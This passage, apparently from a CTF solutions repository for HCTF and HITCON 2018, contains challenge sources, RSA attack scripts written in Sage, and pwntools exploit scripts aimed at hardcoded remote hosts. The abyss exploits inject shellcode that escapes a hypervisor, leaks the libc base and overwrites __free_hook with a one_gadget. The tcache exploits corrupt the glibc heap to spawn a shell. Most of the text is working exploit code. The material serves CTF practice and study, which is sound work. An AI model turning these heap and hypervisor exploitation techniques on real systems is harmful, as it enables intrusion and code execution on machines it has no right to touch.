ans2 = self.request.recv(2048).strip() if str(ans1) == str(m1) and str(ans2) == str(m2): self.request.sendall(FLAG) else: self.request.sendall("wrong answer\n") if __name__ == "__main__": HOST, PORT = "0.0.0.0", 10086 server = ThreadedTCPServer((HOST, PORT), RSATCPHandler) server.serve_forever() ================================================ FILE: 2018/hctf-quals-2018/crypto/xor_rsa/short.sage ================================================ # coppersmiths_short_pad_attack.sage def short_pad_attack(c1, c2, e, n): PRxy. = PolynomialRing(Zmod(n)) PRx. = PolynomialRing(Zmod(n)) PRZZ. = PolynomialRing(Zmod(n)) g1 = x^e - c1 g2 = (x+y)^e - c2 q1 = g1.change_ring(PRZZ) q2 = g2.change_ring(PRZZ) h = q2.resultant(q1) h = h.univariate_polynomial() h = h.change_ring(PRx).subs(y=xn) h = h.monic() kbits = n.nbits()//(2*e*e) diff = h.small_roots(X=2^kbits, beta=0.5)[0] # find root < 2^kbits with factor >= n^0.5 return diff def related_message_attack(c1, c2, diff, e, n): PRx. = PolynomialRing(Zmod(n)) g1 = x^e - c1 g2 = (x+diff)^e - c2 def gcd(g1, g2): while g2: g1, g2 = g2, g1 % g2 return g1.monic() return -gcd(g1, g2)[0] if __name__ == '__main__': n = 17760586611989839530764979012315071619919521509875577626429478606274454241159678043810535746332966623663058670717300715547460779268205588389460820067720466352462776717765410586237571959320858214158134024547312265658490071162506700553971039667651135703115866474963876568547778185684728976673717836120304792047315299189632165445283227749873928756096282732528600539673881253373954330133034705428731024702378983696042092279994846922715729685850148779456313632340984860119547605515841848761494920844946127790173917351501172069819897003567918129263893945312339139192847852630585971500788355587457718254527965657865284126859 e = 5 """ nbits = n.nbits() kbits = nbits//(2*e*e) print "upper %d bits (of %d bits) is same" % (nbits-kbits, nbits) # ^^ = bit-wise XOR # http://doc.sagemath.org/html/en/faq/faq-usage.html#how-do-i-use-the-bitwise-xor-operator-in-sage m1 = randrange(2^nbits) m2 = m1 ^^ randrange(2^kbits) c1 = pow(m1, e, n) c2 = pow(m2, e, n) """ c1 = 7322210871697596223986977504349300957036993199901476670012435325294500304519612337726472460654356124758843208920397603694130360504515139522603740981236715497784580249917859115941502172046171628503054851377787479584337204426817039508510964061244254857320581516172440458341426708727804523348977179551285187758742308549770306927309773303460270597198571790358077417922907937798973284960219056392812160836982204307918084101150724238061787002416728927764976371024273705145359733084655215153762918243436269136368386630749616150354663589931936137788873890785263318466131986098706097166284510567091187418981129753292655680531 c2 = 6170338375944805179635034130757907468674440136512277929343909338031208502252825119687936824460408955177940212315598356132098877301132435375696672858646293971606757090532674769732578026333496549247284105121797016613239060172344035118250633668395522209672919153838492143928700498459353175749689128550387441868967841018409595816098415762784686269442751177948752272383779454299316060228992365856212380486591247305369383216244732123770545642612542077417708022443097791807030119137452641911942922053825794933342880548637166670501443895698671024605530585297052471679796225998254296292340039579515125764186427116589410443451 diff = short_pad_attack(c1, c2, e, n) print "difference of two messages is %d" % diff #print m1 m1 = related_message_attack(c1, c2, diff, e, n) print m1 #print m2 print m1 + diff ================================================ FILE: 2018/hctf-quals-2018/crypto/xor_rsa/short.sage.py ================================================ __author__ = "polaris" # This file was *autogenerated* from the file short.sage from sage.all_cmdline import * # import sage library _sage_const_2 = Integer(2); _sage_const_6170338375944805179635034130757907468674440136512277929343909338031208502252825119687936824460408955177940212315598356132098877301132435375696672858646293971606757090532674769732578026333496549247284105121797016613239060172344035118250633668395522209672919153838492143928700498459353175749689128550387441868967841018409595816098415762784686269442751177948752272383779454299316060228992365856212380486591247305369383216244732123770545642612542077417708022443097791807030119137452641911942922053825794933342880548637166670501443895698671024605530585297052471679796225998254296292340039579515125764186427116589410443451 = Integer(6170338375944805179635034130757907468674440136512277929343909338031208502252825119687936824460408955177940212315598356132098877301132435375696672858646293971606757090532674769732578026333496549247284105121797016613239060172344035118250633668395522209672919153838492143928700498459353175749689128550387441868967841018409595816098415762784686269442751177948752272383779454299316060228992365856212380486591247305369383216244732123770545642612542077417708022443097791807030119137452641911942922053825794933342880548637166670501443895698671024605530585297052471679796225998254296292340039579515125764186427116589410443451); _sage_const_0 = Integer(0); _sage_const_5 = Integer(5); _sage_const_0p5 = RealNumber('0.5'); _sage_const_17760586611989839530764979012315071619919521509875577626429478606274454241159678043810535746332966623663058670717300715547460779268205588389460820067720466352462776717765410586237571959320858214158134024547312265658490071162506700553971039667651135703115866474963876568547778185684728976673717836120304792047315299189632165445283227749873928756096282732528600539673881253373954330133034705428731024702378983696042092279994846922715729685850148779456313632340984860119547605515841848761494920844946127790173917351501172069819897003567918129263893945312339139192847852630585971500788355587457718254527965657865284126859 = Integer(17760586611989839530764979012315071619919521509875577626429478606274454241159678043810535746332966623663058670717300715547460779268205588389460820067720466352462776717765410586237571959320858214158134024547312265658490071162506700553971039667651135703115866474963876568547778185684728976673717836120304792047315299189632165445283227749873928756096282732528600539673881253373954330133034705428731024702378983696042092279994846922715729685850148779456313632340984860119547605515841848761494920844946127790173917351501172069819897003567918129263893945312339139192847852630585971500788355587457718254527965657865284126859); _sage_const_7322210871697596223986977504349300957036993199901476670012435325294500304519612337726472460654356124758843208920397603694130360504515139522603740981236715497784580249917859115941502172046171628503054851377787479584337204426817039508510964061244254857320581516172440458341426708727804523348977179551285187758742308549770306927309773303460270597198571790358077417922907937798973284960219056392812160836982204307918084101150724238061787002416728927764976371024273705145359733084655215153762918243436269136368386630749616150354663589931936137788873890785263318466131986098706097166284510567091187418981129753292655680531 = Integer(7322210871697596223986977504349300957036993199901476670012435325294500304519612337726472460654356124758843208920397603694130360504515139522603740981236715497784580249917859115941502172046171628503054851377787479584337204426817039508510964061244254857320581516172440458341426708727804523348977179551285187758742308549770306927309773303460270597198571790358077417922907937798973284960219056392812160836982204307918084101150724238061787002416728927764976371024273705145359733084655215153762918243436269136368386630749616150354663589931936137788873890785263318466131986098706097166284510567091187418981129753292655680531)# coppersmiths_short_pad_attack.sage def short_pad_attack(c1, c2, e, n): PRxy = PolynomialRing(Zmod(n), names=('x', 'y',)); (x, y,) = PRxy._first_ngens(2) PRx = PolynomialRing(Zmod(n), names=('xn',)); (xn,) = PRx._first_ngens(1) PRZZ = PolynomialRing(Zmod(n), names=('xz', 'yz',)); (xz, yz,) = PRZZ._first_ngens(2) g1 = x**e - c1 g2 = (x+y)**e - c2 q1 = g1.change_ring(PRZZ) q2 = g2.change_ring(PRZZ) h = q2.resultant(q1) h = h.univariate_polynomial() h = h.change_ring(PRx).subs(y=xn) h = h.monic() kbits = n.nbits()//(_sage_const_2 *e*e) diff = h.small_roots(X=_sage_const_2 **kbits, beta=_sage_const_0p5 )[_sage_const_0 ] # find root < 2^kbits with factor >= n^0.5 return diff def related_message_attack(c1, c2, diff, e, n): PRx = PolynomialRing(Zmod(n), names=('x',)); (x,) = PRx._first_ngens(1) g1 = x**e - c1 g2 = (x+diff)**e - c2 def gcd(g1, g2): while g2: g1, g2 = g2, g1 % g2 return g1.monic() return -gcd(g1, g2)[_sage_const_0 ] if __name__ == '__main__': n = _sage_const_17760586611989839530764979012315071619919521509875577626429478606274454241159678043810535746332966623663058670717300715547460779268205588389460820067720466352462776717765410586237571959320858214158134024547312265658490071162506700553971039667651135703115866474963876568547778185684728976673717836120304792047315299189632165445283227749873928756096282732528600539673881253373954330133034705428731024702378983696042092279994846922715729685850148779456313632340984860119547605515841848761494920844946127790173917351501172069819897003567918129263893945312339139192847852630585971500788355587457718254527965657865284126859 e = _sage_const_5 """ nbits = n.nbits() kbits = nbits//(2*e*e) print "upper %d bits (of %d bits) is same" % (nbits-kbits, nbits) # ^^ = bit-wise XOR # http://doc.sagemath.org/html/en/faq/faq-usage.html#how-do-i-use-the-bitwise-xor-operator-in-sage m1 = randrange(2^nbits) m2 = m1 ^^ randrange(2^kbits) c1 = pow(m1, e, n) c2 = pow(m2, e, n) """ c1 = _sage_const_7322210871697596223986977504349300957036993199901476670012435325294500304519612337726472460654356124758843208920397603694130360504515139522603740981236715497784580249917859115941502172046171628503054851377787479584337204426817039508510964061244254857320581516172440458341426708727804523348977179551285187758742308549770306927309773303460270597198571790358077417922907937798973284960219056392812160836982204307918084101150724238061787002416728927764976371024273705145359733084655215153762918243436269136368386630749616150354663589931936137788873890785263318466131986098706097166284510567091187418981129753292655680531 c2 = _sage_const_6170338375944805179635034130757907468674440136512277929343909338031208502252825119687936824460408955177940212315598356132098877301132435375696672858646293971606757090532674769732578026333496549247284105121797016613239060172344035118250633668395522209672919153838492143928700498459353175749689128550387441868967841018409595816098415762784686269442751177948752272383779454299316060228992365856212380486591247305369383216244732123770545642612542077417708022443097791807030119137452641911942922053825794933342880548637166670501443895698671024605530585297052471679796225998254296292340039579515125764186427116589410443451 diff = short_pad_attack(c1, c2, e, n) print "difference of two messages is %d" % diff #print m1 m1 = related_message_attack(c1, c2, diff, e, n) print m1 #print m2 print m1 + diff ================================================ FILE: 2018/hctf-quals-2018/misc/freqgame/freqexp.py ================================================ #!/usr/bin/env python __author__ = "polaris" import numpy as np from pwn import * import matplotlib.pyplot as plt #context.log_level = "debug" def get_number(x, freq,rge): y = np.sin(2*np.pi*x*freq)*rge return y p = remote("150.109.119.46",6775) p.recvuntil("hint:") p.sendline("y") p.recvuntil("input your token:") p.sendline("H2RHMpUvWhtgAutnpZ6Tyd6CzdOX2TJc") for i in range(8): print i data = eval(p.recvuntil("]")) x = np.linspace(0,1,1500) y=np.fft.fft(data) yf=abs(y) yf1=abs(y)/len(x) yf2 = yf1[range(int(len(x)/2))] xf = np.arange(len(y)) xf1 = xf xf2 = xf[range(int(len(x)/2))] tmp = list(yf2) res = [] for i in range(len(tmp)): if tmp[i]>3: res.append(str(i)) assert(len(res)==4) p.sendline(" ".join(res)) p.interactive() ================================================ FILE: 2018/hctf-quals-2018/misc/freqgame/freqgame.py ================================================ #!/usr/bin/env python def get_number(x, freq,rge): y = np.sin(2*np.pi*x*freq)*rge return y def divide_flag(token): flag_list = [] flag = "****************************************************************" for i in range(0,64,2): flag_list.append(int(flag[i]+flag[i+1],16)) return flag,flag_list def game(level,flag_list): level = level*4 freq_list = flag_list[level:level+4] x = np.linspace(0,1,1500) y = [] for freq in freq_list: if y == []: y = get_number(x,freq,7) else: y += get_number(x,freq,7) return y,freq_list def start_game(tcpClisock,token,userlogger): flag,flag_list = divide_flag(token) level = 0 while True: if level == 8: tcpClisock.sendall((CONGRATULATION_TXT.format("hctf{"+flag+"}")).encode("utf-8")) break y,freq_list = game(level,flag_list) send_data = json.dumps(list(y)).encode("utf-8") tcpClisock.sendall(send_data) req_data = tcpClisock.recv(1024).decode("utf-8").replace("\n","") req = req_data.split(" ") req.sort() freq_list.sort() if req == freq_list: level += 1 continue else: break tcpClisock.close() ================================================ FILE: 2018/hitcon-2018/crypto/key/exp.py ================================================ __author__ = "polaris" from Crypto.Util.number import long_to_bytes,GCD,bytes_to_long from pwn import * #context.log_level = "debug" #p = remote("18.179.251.168",21700) p = remote("127.0.0.1",8889) p.recvline() flag = p.recvline().strip() nn = int(p.recvline().strip()) e = int(p.recvline().strip()) d = int(p.recvline().strip()) fff = p.recvline().strip() print "e",e print "d",d print "fff",fff def enc(data): p.recvuntil("cmd: ") p.sendline("A") p.recvuntil("input: ") p.sendline(long_to_bytes(data).encode('hex')) return int(p.recvline().strip(),16) def dec(data): p.recvuntil("cmd: ") p.sendline("B") p.recvuntil("input: ") p.sendline(long_to_bytes(data).encode('hex')) return int(p.recvline().strip(),16) c2 = enc(2) c5 = enc(5) c4 = enc(4) c25 = enc(25) n1 = c2*c2-c4 n2 = c5*c5-c25 n = GCD(n1,n2) while n%2==0: n=n/2 #c123 = enc(123) print "n",n print "nn",nn #assert(pow(123,)) print("get n ok") c256 = enc(256) #low = bytes_to_long("\xff"*118) #high = bytes_to_long("\xff"*128) flag = int(flag,16) cccc = n&0xff mmap = [] for i in range(256): for k in range(256): if ((i+k*cccc)&0xff)==0x00: mmap.append(k) break print mmap #0x00-kn=b xdd = 0 bit = 0 print flag raw_input() #flag = pow(int("929e5ca2efdfff05d8c096b95eacb7b30575eb7e154369fcc842b7dcbc4c033ef87964240a8c2d0c7c9a00348bd8f79887c2fdb28a10d9398314f9e778da8566cff486d56161616161616161616161616161616161616161616161616161616161616363636363636363636364646464646464646161",16),e,n) while n>>bit: flag = (c256*flag)%n b = dec(flag) k = mmap[b] print k xdd = 256*xdd+k bit += 8 #kn/256>bit: flag = (c256*flag)%n b = dec(flag) k = mmap[b] print k xdd = 256*xdd+k bit += 8 #kn/256= 50 assert len(flag) <= 60 prefix = os.urandom(68) return prefix+flag if __name__ == '__main__': n,e,d = genKey() flag = calc(n,e,readFlag()) print 'Here is the flag!' print flag for i in xrange(150): msg = raw_input('cmd: ') if msg[0] == 'A': m = raw_input('input: ') try: m = m.decode('hex') print calc(n,e,m) except: print 'no' exit(0) elif msg[0] == 'B': m = raw_input('input: ') try: m = m.decode('hex') print calc(n,d,m)[-2:] except: print 'no' exit(0) ================================================ FILE: 2018/hitcon-2018/crypto/key/test.py ================================================ #!/usr/bin/env python from Crypto.Util.number import * from gmpy import * import os,sys sys.stdin = os.fdopen(sys.stdin.fileno(), 'r', 0) sys.stdout = os.fdopen(sys.stdout.fileno(), 'w', 0) def genKey(): p = getPrime(512) q = getPrime(512) n = p*q phi = (p-1)*(q-1) while True: e = getRandomInteger(40) if gcd(e,phi) == 1: d = int(invert(e,phi)) return n,e,d def calc(n,p,data): num = bytes_to_long(data) res = pow(num,p,n) return long_to_bytes(res).encode('hex') def readFlag(): flag = open('flag').read() assert len(flag) >= 50 assert len(flag) <= 60 prefix = os.urandom(68) return prefix+flag if __name__ == '__main__': n,e,d = genKey() aaa = readFlag() flag = calc(n,e,aaa) print 'Here is the flag!' print flag print n print e print d print aaa.encode('hex') for i in xrange(150): msg = raw_input('cmd: ') if msg[0] == 'A': m = raw_input('input: ') try: m = m.decode('hex') print calc(n,e,m) except: print 'no' exit(0) elif msg[0] == 'B': m = raw_input('input: ') try: m = m.decode('hex') print calc(n,d,m)[-2:] except: print 'no' exit(0) ================================================ FILE: 2018/hitcon-2018/misc/ev3scanner/test.py ================================================ __author__ = "polaris" data = "" from Crypto.Util.number import bytes_to_long with open("ev3_scanner_record.pklg","rb") as f: data = f.read() """ flag1 = "\x0d\x00\x2a\x00\x00" flag2 = "\x07\x00\x2a\x00\x02" res = [] while True: if flag in data: i = data.index(flag) res.append(bytes_to_long(data[i+5:i+9])) print data[i+5:i+9].encode('hex') data = data[i+10:] else: break print len(res) for i in res: if i<0xa000: print 1, elif i<0xffff: print 0, else: raw_input() """ """ flag = "\x0d\x00\x2a\x00\x00" res = [] while True: if flag in data: i = data.index(flag) res.append(data[i+5:i+15]) print data[i+5:i+15].encode('hex') data = data[i+16:] else: break print len(res) print set(res) print res.count('\x04\x9a+\x01\x00\x00\x94\xf9\xc9[') """ def getres(): data = "" with open("ev3_scanner_record.pklg","rb") as f: data = f.read() flag1 = "\x0d\x00\x2a\x00\x00" flag2 = "\x07\x00\x2a\x00\x02" d1 = '\x04\x00\x99\x1d\x00\x01\x00\x00\x01`' d2 = '\x04\x00\x99\x1d\x00\x02\x00\x02\x01`' res1 = [] res2 = [] for i in range(len(data)-5): if data[i:i+5] == flag1: res1.append(data[i+5:i+15]==d1) elif data[i:i+5] == flag2: res2.append(data[i+5:i+9]) return res1, res2 ================================================ FILE: 2018/hitcon-2018/pwn/abyss/README.md ================================================ * ld.so.2 and libc.so.6 are system libs from Ubuntu 18.04 * ./hypervisor.elf kernel.bin ld.so.2 ./user.elf ================================================ FILE: 2018/hitcon-2018/pwn/abyss/exp1.py ================================================ from pwn import * LOCAL = 0 DEDUG = 0 VERBOSE = 0 if VERBOSE: context(log_level = 'debug', arch='amd64') else: context(log_level = 'critical', arch='amd64') context.terminal = ['tmux', 'splitw', '-h'] if LOCAL: # io = process(['./hypervisor.elf', 'kernel.bin', 'ld.so.2', './user.elf'], aslr=False) io = process(['./hypervisor.elf', 'kernel.bin', 'ld.so.2', './user.elf']) if DEDUG: gdb.attach(io, 'b *0x0000555555555a05') else: io = remote('35.200.23.198', 31733) def my_asm(instrcutions): instrcutions = filter(lambda ins: ins is not '', map(lambda ins: ins.strip(), instrcutions.split('\n'))) bytecodes = '' for ins in instrcutions: data = ins.split(' ') op = data[0] if op == 'pushb': bytecodes += chr(int(data[1]) + 97) elif op == 'pushd': if data[1].startswith('0x'): bytecodes += str(int(data[1], 16)) else: bytecodes += data[1] elif op == 'dup': bytecodes += chr(0x24) elif op == 'pop': bytecodes += chr(0x25) elif op == 'and': bytecodes += chr(0x26) elif op == 'mul': bytecodes += chr(0x2A) elif op == 'add': bytecodes += chr(0x2B) elif op == 'write': bytecodes += chr(0x2C) elif op == 'minus': bytecodes += chr(0x2D) elif op == 'writed': bytecodes += chr(0x2E) elif op == 'div': bytecodes += chr(0x2F) elif op == 'store': bytecodes += chr(0x3A) elif op == 'fetch': bytecodes += chr(0x3B) elif op == 'eql': bytecodes += chr(0x3D) elif op == 'gt': bytecodes += chr(0x3E) elif op == 'rot': bytecodes += chr(0x40) elif op == 'swap': bytecodes += chr(0x5C) elif op == 'neg': bytecodes += chr(0x5F) elif op == 'or': bytecodes += chr(0x7C) elif op == 'not': bytecodes += chr(0x7E) return bytecodes def to_int(val): if val.startswith('-'): return int((1<<32) - int(val[1:])) else: return int(val) def put_shellcode(shellcode): result = '' push_count = 0 for i in range(0, len(shellcode), 4): val = u32(shellcode[i:i+4].ljust(4, '\x00')) result += my_asm('pushd %d\nneg\nneg' % val) push_count += 1 for i in range(push_count): result += my_asm('pop') return result def OFFSET(v, bits): return ((v >> bits) & 0x1ff) def PML4OFF(v): return OFFSET(v, 39) def PDPOFF(v): return OFFSET(v, 30) def PDOFF(v): return OFFSET(v, 21) shellcode = asm( ''' mov rax, 0x67616c66 push rax mov rdi, rsp mov rsi, 0 mov rax, 2 syscall mov rdi, rax mov rsi, rbp mov rdx, 0x40 mov rax, 0 syscall mov rdi, 1 mov rsi, rbp mov rax, 1 syscall ''' ) bytecodes = my_asm('pushd %d\nneg\nneg' % 0xffffffe4) bytecodes2 = my_asm( ''' swap pushd %d add pushb 0 store pop pop pop pop pushb 0 fetch write ''' % (0x2018f2)) bytecodes += put_shellcode(shellcode) + bytecodes2 #print bytecodes io.recvuntil('down.\n') io.sendline(bytecodes) io.interactive() ================================================ FILE: 2018/hitcon-2018/pwn/abyss/exp2.py ================================================ from pwn import * LOCAL = 0 DEDUG = 0#1 VERBOSE = 0 if VERBOSE: context(log_level = 'debug', arch='amd64') else: context(log_level = 'critical', arch='amd64') context.terminal = ['tmux', 'splitw', '-h'] if LOCAL: # io = process(['./hypervisor.elf', 'kernel.bin', 'ld.so.2', './user.elf'], aslr=False) io = process(['./hypervisor.elf', 'kernel.bin', 'ld.so.2', './user.elf']) if DEDUG: gdb.attach(io, 'b *0x0000555555556143 if $rdx==0x1000\nb *0x0000555555555F5E\nb *0x0000555555556143 if $rdx==0x40\n') else: io = remote('35.200.23.198', 31733) def my_asm(instrcutions): instrcutions = filter(lambda ins: ins is not '', map(lambda ins: ins.strip(), instrcutions.split('\n'))) bytecodes = '' for ins in instrcutions: data = ins.split(' ') op = data[0] if op == 'pushb': bytecodes += chr(int(data[1]) + 97) elif op == 'pushd': if data[1].startswith('0x'): bytecodes += str(int(data[1], 16)) else: bytecodes += data[1] elif op == 'dup': bytecodes += chr(0x24) elif op == 'pop': bytecodes += chr(0x25) elif op == 'and': bytecodes += chr(0x26) elif op == 'mul': bytecodes += chr(0x2A) elif op == 'add': bytecodes += chr(0x2B) elif op == 'write': bytecodes += chr(0x2C) elif op == 'minus': bytecodes += chr(0x2D) elif op == 'writed': bytecodes += chr(0x2E) elif op == 'div': bytecodes += chr(0x2F) elif op == 'store': bytecodes += chr(0x3A) elif op == 'fetch': bytecodes += chr(0x3B) elif op == 'eql': bytecodes += chr(0x3D) elif op == 'gt': bytecodes += chr(0x3E) elif op == 'rot': bytecodes += chr(0x40) elif op == 'swap': bytecodes += chr(0x5C) elif op == 'neg': bytecodes += chr(0x5F) elif op == 'or': bytecodes += chr(0x7C) elif op == 'not': bytecodes += chr(0x7E) return bytecodes def to_int(val): if val.startswith('-'): return int((1<<32) - int(val[1:])) else: return int(val) def put_shellcode(shellcode): result = '' push_count = 0 for i in range(0, len(shellcode), 4): val = u32(shellcode[i:i+4].ljust(4, '\x00')) result += my_asm('pushd %d\nneg\nneg' % val) push_count += 1 for i in range(push_count): result += my_asm('pop') return result def OFFSET(v, bits): return ((v >> bits) & 0x1ff) def PML4OFF(v): return OFFSET(v, 39) def PDPOFF(v): return OFFSET(v, 30) def PDOFF(v): return OFFSET(v, 21) shellcode = asm( ''' mov r9d,0x0 mov r8d,0xffffffffffffffff mov r10d,0x0 mov edx,0x3 mov ecx, 0x10 mov rsi, 0x1739000 mov edi,0 mov rax,9 syscall mov rsi, rax mov rax, 0 mov rdi, 0 mov rdx, 0xf000 syscall ''' ) bytecodes = my_asm('pushd %d\nneg\nneg' % 0xffffffe4) bytecodes2 = my_asm( ''' swap pushd %d add pushb 0 store pop pop pop pop pushb 0 fetch write ''' % (0x2018f2)) bytecodes += put_shellcode(shellcode) + bytecodes2 #print bytecodes io.recvuntil('down.\n') io.sendline(bytecodes) shellcode2 = asm( ''' mov rax, 0x0000003267616c66 push rax mov rdi, rsp mov rsi, 0x8000000000 xor rdi, rsi ''') shellcode2 += '\xe8' + p32(0xcdf) shellcode2 += asm( ''' mov rsi, 0xb800 mov rdi, rax mov rdx, 0x40 ''') shellcode2 += '\xe8' + p32(0xc0d) shellcode2 += asm( ''' mov rsi, 0xb800 mov rdi, 1 mov rdx, 0x40 ''') shellcode2 += '\xe8' + p32(0xcbb) #raw_input() io.send('A' * 0x17f + shellcode2) io.interactive() ================================================ FILE: 2018/hitcon-2018/pwn/abyss/exp3.py ================================================ from pwn import * LOCAL = 0 DEDUG = 0 VERBOSE = 0 if VERBOSE: context(log_level = 'debug', arch='amd64') else: context(log_level = 'info', arch='amd64') context.terminal = ['tmux', 'splitw', '-h'] if LOCAL: # io = process(['./hypervisor.elf', 'kernel.bin', 'ld.so.2', './user.elf'], aslr=False) io = process(['./hypervisor.elf', 'kernel.bin', 'ld.so.2', './user.elf']) if DEDUG: gdb.attach(io, 'b *0x555555556856\nb *0x0000555555556143 if $rdx==0x1000\nb *0x0000555555555F5E\nb *0x0000555555556143 if $rdx==0x8\n') else: io = remote('35.200.23.198', 31733) def my_asm(instrcutions): instrcutions = filter(lambda ins: ins is not '', map(lambda ins: ins.strip(), instrcutions.split('\n'))) bytecodes = '' for ins in instrcutions: data = ins.split(' ') op = data[0] if op == 'pushb': bytecodes += chr(int(data[1]) + 97) elif op == 'pushd': if data[1].startswith('0x'): bytecodes += str(int(data[1], 16)) else: bytecodes += data[1] elif op == 'dup': bytecodes += chr(0x24) elif op == 'pop': bytecodes += chr(0x25) elif op == 'and': bytecodes += chr(0x26) elif op == 'mul': bytecodes += chr(0x2A) elif op == 'add': bytecodes += chr(0x2B) elif op == 'write': bytecodes += chr(0x2C) elif op == 'minus': bytecodes += chr(0x2D) elif op == 'writed': bytecodes += chr(0x2E) elif op == 'div': bytecodes += chr(0x2F) elif op == 'store': bytecodes += chr(0x3A) elif op == 'fetch': bytecodes += chr(0x3B) elif op == 'eql': bytecodes += chr(0x3D) elif op == 'gt': bytecodes += chr(0x3E) elif op == 'rot': bytecodes += chr(0x40) elif op == 'swap': bytecodes += chr(0x5C) elif op == 'neg': bytecodes += chr(0x5F) elif op == 'or': bytecodes += chr(0x7C) elif op == 'not': bytecodes += chr(0x7E) return bytecodes def to_int(val): if val.startswith('-'): return int((1<<32) - int(val[1:])) else: return int(val) def put_shellcode(shellcode): result = '' push_count = 0 for i in range(0, len(shellcode), 4): val = u32(shellcode[i:i+4].ljust(4, '\x00')) result += my_asm('pushd %d\nneg\nneg' % val) push_count += 1 for i in range(push_count): result += my_asm('pop') return result def OFFSET(v, bits): return ((v >> bits) & 0x1ff) def PML4OFF(v): return OFFSET(v, 39) def PDPOFF(v): return OFFSET(v, 30) def PDOFF(v): return OFFSET(v, 21) bytecodes = my_asm('pushd %d\nneg\nneg' % 0xffffffe4) bytecodes2 = my_asm( ''' swap pushd %d add pushb 0 store pop pop pop pop pushb 0 fetch write ''' % (0x2018f2) ) shellcode = asm( ''' mov r9d,0x0 mov r8d,0xffffffffffffffff mov ecx, 0x10 mov edx,0x3 mov esi,0x1739000 mov edi,0 mov rax,9 syscall mov rsi, rax mov rax, 0 mov rdi, 0 mov rdx, 0xf000 syscall ''' ) bytecodes += put_shellcode(shellcode) + bytecodes2 io.recvuntil('down.\n') io.sendline(bytecodes) hp_read = 0xdc2 hp_open = 0xe7e hp_write = 0xe8a hp_access = 0xe1e hp_lseek = 0xee6 hypercall = 0xe72 shellcode2 = '\x90' * 0x17f shellcode2 += asm( ''' mov rax, 0x007370616d2f666c push rax mov rax, 0x65732f636f72702f push rax mov rdi, rsp mov rsi, 0x8000000000 xor rdi, rsi ''' ) shellcode2 += asm('call $+%d' % (hp_open - len(shellcode2))) print shellcode2.encode('hex') shellcode2 += asm( ''' mov rsi, 0xb800 mov rdi, rax mov rdx, 0x800 ''' ) shellcode2 += asm('call $+%d' % (hp_read - len(shellcode2))) shellcode2 += asm( ''' mov rsi, 0xb800 mov rdi, 1 mov rdx, 0x800 ''' ) shellcode2 += asm('call $+%d' % (hp_write - len(shellcode2))) shellcode3_addr = 0xb000 shellcode2 += asm( ''' mov rdi, 0 mov rsi, %d mov rdx, 0x1000 ''' % (shellcode3_addr) ) shellcode2 += asm('call $+%d' % (hp_read - len(shellcode2))) shellcode2 += asm('jmp $+%d' % (shellcode3_addr - len(shellcode2))) io.sendline(shellcode2) data = io.recvuntil('[vsyscall]\n') for _ in data.split('\n'): if '/lib/x86_64-linux-gnu/libc-2.27.so' in _: print _ libc_base = int(_.split('-')[0], 16) log.info('libc base %#x' % libc_base) break vmem = libc_base - 0x2000000 shellcode3 = asm( ''' mov edi, 0x8008 mov esi, %d ''' % (shellcode3_addr+0x200)) shellcode3 += asm('call $-%d' % (shellcode3_addr + len(shellcode3) - hypercall)) shellcode3 += asm( ''' mov rdi, 0 mov rsi, 0x1fb088 mov rdx, 0x8 ''' ) shellcode3 += asm('call $-%d' % (shellcode3_addr + len(shellcode3) - hp_read)) one_gadget = libc_base + 0x4f322 system = libc_base + 0x4F440 free_hook = 0x3ed8e8 shellcode3 += asm( ''' mov rdi, %d mov rsi, %d mov [rdi], rsi ''' % (0x80023ed8e8, one_gadget)) shellcode3 += asm( ''' mov rdi, 1 mov rsi, 0xdeadbeafdeadbeaf mov rdx, 0x8 ''' ) shellcode3 += asm('call $-%d' % (shellcode3_addr + len(shellcode3) - hp_write)) assert len(shellcode3) <= 0x200 shellcode3 = shellcode3.ljust(0x200, '\xcc') shellcode3 += p64(0x4)+p64(0x4020AE46)+p64(shellcode3_addr + 0x200 + 8*3) shellcode3 += p32(1)+p32(0)+p64(0x2000000)+p64(0x2000000)+p64(vmem+0x2000000) io.sendline(shellcode3) #raw_input() io.send(p64(0x2200083)) io.interactive() ================================================ FILE: 2018/hitcon-2018/pwn/abyss/flag ================================================ hitcon{---flag1-will-be-here---} ================================================ FILE: 2018/hitcon-2018/pwn/abyss/flag2 ================================================ hitcon{---flag2-will-be-here---} ================================================ FILE: 2018/hitcon-2018/pwn/abyss/flag3-md5-of-content ================================================ hitcon{---flag3-will-be-here---} ================================================ FILE: 2018/hitcon-2018/pwn/baby_tcache/exp.py ================================================ #!/usr/bin/env python # encoding: utf-8 __author__ = 'b1gtang' from pwn import * context.terminal = ['tmux', 'splitw', '-h'] BINARY = './baby_tcache' TARGET = ('52.68.236.186', 56746) if args.E: # or args.R: LIBC64 = './libc.so.6' else: LIBC64 = '/lib/x86_64-linux-gnu/libc.so.6' if args.R: r = remote(TARGET[0], TARGET[1]) else: r = process(BINARY, env={'LD_PRELOAD':LIBC64}) def attach(addr): if addr <= 0x400000: addr = addr + 0x555555554000 gdb.attach(r, gdbscript='b *0x%x' % addr) def malloc(size, data): r.sendlineafter('Your choice:', '1') r.sendlineafter('Size:', str(size)) r.sendafter('Data:', str(data)) def free(idx): r.sendlineafter('Your choice:', '2') r.sendlineafter('Index:', str(idx)) code = ELF(BINARY) libc = ELF(LIBC64) # attach(0xeed) malloc(0xf10, 'x') # 0 malloc(0x410, 'xdd') # 1 malloc(0x80, 'barrier') # 2 # shrink heap free(0) malloc(0x108, 'a'*0x108) # 0 malloc(0x80, 'b1') # 3 # unlink malloc(0x80, 'b2') # 4 # free 3 for i in xrange(5): malloc(0x80, 'c') # 5,6,7,8,9 for i in xrange(6): free(9-i) malloc(0x70, 'xdd') # 4 overlap 2 free(2) free(3) free(1) # free xdd free(4) # leak malloc(0x980, 'x') # 1 malloc(0x40, '\x60\x07') # 2 malloc(0x80, 'x') # 3 malloc(0x50, 'o'*0x30 + p64(0x90) + p64(0x90) + '\x70\x73') # 4 malloc(0x80, 'x') # 5 malloc(0x80, 'y') # 6 malloc(0x80, p64(0xfbad3c80) + p64(0)*3 + "\x08") #0xfbad2887 libc.address = u64(r.recv(8)) - 0x3ed8b0 log.info(hex(libc.address)) malloc(0x350, 'x'*0x340+p64(libc.sym['__free_hook'])) # 8 malloc(0x70, 'x') # 9 free(2) # 0 malloc(0x70, p64(libc.address + 0x4f322)) free(3) r.interactive() ================================================ FILE: 2018/hitcon-2018/pwn/children_tcache/exp.py ================================================ #!/usr/bin/env python # encoding: utf-8 __author__ = 'b1gtang' from pwn import * # hitcon{l4st_rem41nd3r_1s_v3ry_us3ful} context.terminal = ['tmux', 'splitw', '-h'] BINARY = './children_tcache' TARGET = ('54.178.132.125', 8763) if args.E: # or 